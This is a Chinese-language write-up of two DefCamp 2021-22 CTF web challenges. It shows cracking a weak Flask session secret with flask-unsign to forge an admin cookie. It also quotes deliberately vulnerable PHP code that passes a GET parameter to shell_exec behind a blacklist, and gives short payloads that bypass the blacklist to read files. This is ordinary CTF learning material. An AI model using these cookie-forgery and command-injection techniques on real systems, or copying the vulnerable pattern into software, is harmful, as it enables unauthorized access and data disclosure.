其余的看wp云了
https://dctf21.cyberedu.ro/#challenges
https://ctftime.org/event/1560/tasks/
http://www.yongsheng.site/2022/02/14/DefCamp%20CTF(D-CTF)2021-22%20web/
web-intro
Are you an admin?
Note: Access Denied is part of the challenge.
34.159.7.96:32291
首页就是403,cookie部分是flask session
$ python3 flask_session_cookie_manager3.py decode -c 'eyJsb2dnZWRfaW4iOmZhbHNlfQ.YgfX-Q.-TlY9gWLpyzptE31U0IwjpQ74ZI'
b'{"logged_in":false}'
但是不知道secret-key是啥,用c-jwt-cracker,爆了很久没爆出来key,换flask-unsign
flask-unsign --unsign --cookie "eyJsb2dnZWRfaW4iOmZhbHNlfQ.YgfX-Q.-TlY9gWLpyzptE31U0IwjpQ74ZI"
特别快就跑出来了。。。key是password
,把false改为true即可,注意t要大写!
flask-unsign --sign --cookie "{'logged_in':True}" --secret 'password'
eyJsb2dnZWRfaW4iOnRydWV9.Yg0uRg.9__6dvOpRJAfT_xO1SeU_jNk3CQ
这个故事告诉我们不能用c-jwt-cracker,快跑!!!
para-code
I do not think that this API needs any sort of security testing as it only executes and retrieves the output of ID and PS commands.
34.159.129.6:32136
<?php
require __DIR__ . '/flag.php';
if (!isset($_GET['start'])){
show_source(__FILE__);
exit;
}
$blackList = array(
'ss','sc','aa','od','pr','pw','pf','ps','pa','pd','pp','po','pc','pz','pq','pt','pu','pv','pw','px','py','pq','pk','pj','pl','pm','pn','pq','pf','pz','pv','pw','px','py','pq','pk','pj','pl','pm','pn','pq','pf','pz','pv','pw','px','py','pq','pk','pj','pl','pm','pn','pq','pf','pz','pv','pw','px','py','pq','pk','pj','pl','pm','pn','pq','pf','pz','pv','pw','px','py','pq','pk','pj','pl','pm','pn','pq','pf','pz','pv','pw','px','py','pq','pk','pj','pl','pm','pn','pq','pf','pz','pv','pw','px','py','pq','pk','pj','pl','pm','pn','pq','pf','pz','pv','pw','px','py','pq','pk','pj','pl','pm','pn','pq','pf','pz','pv','pw','px','py','pq','pk','pj','pl','pm','pn','pq','pf','pz','pv','pw','px','py','pq','pk','pj','pl','pm','pn','pq','pf','pz','pv','pw','px','py','pq','pk','pj','pl','pm','pn','pq','pf','pz','pv','pw','px','py','pq','pk','pj','pl','pm','pn','pq','pf','pz','pv','pw','px','py','pq','pk','pj','pl','pm','pn','pq','pf','pz','pv','pw','px','py','pq','pk','pj','pl','pm','pn','pq','ls','dd','nl','nk','df','wc', 'du'
);
$valid = true;
foreach($blackList as $blackItem)
{
if(strpos($_GET['start'], $blackItem) !== false)
{
$valid = false;
break;
}
}
if(!$valid)
{
show_source(__FILE__);
exit;
}
// This will return output only for id and ps.
if (strlen($_GET['start']) < 5){
echo shell_exec($_GET['start']);
} else {
echo "Please enter a valid command";
}
if (False) {
echo $flag;
}
?>
一看这个代码以为致敬[HitconCTF 2017]babyfirst-revenge,不过多了blacklist
然后试了半天发现好像不太行,黑名单太多了导致用那种方式完全做不了,也没有考虑其它角度 就放弃了
看了wp之后才发现我是小丑,tmd
/?start=l\s # flag.php index.php
/?start=m4 *
用到的m4命令,之前完全没用过……所以也没想到
最近做题和学习中明显地发现了自己的不足之处,就是动手太少了,觉得脑子能记住能理解,但实际情况往往就不是这么一回事,你不动手做就是不会,就是不知道中间的坑点在哪里,这样畏手畏脚地是绝对走不远的,也会让自己很难受
时刻提醒自己,要脚踏实地的学,认真一些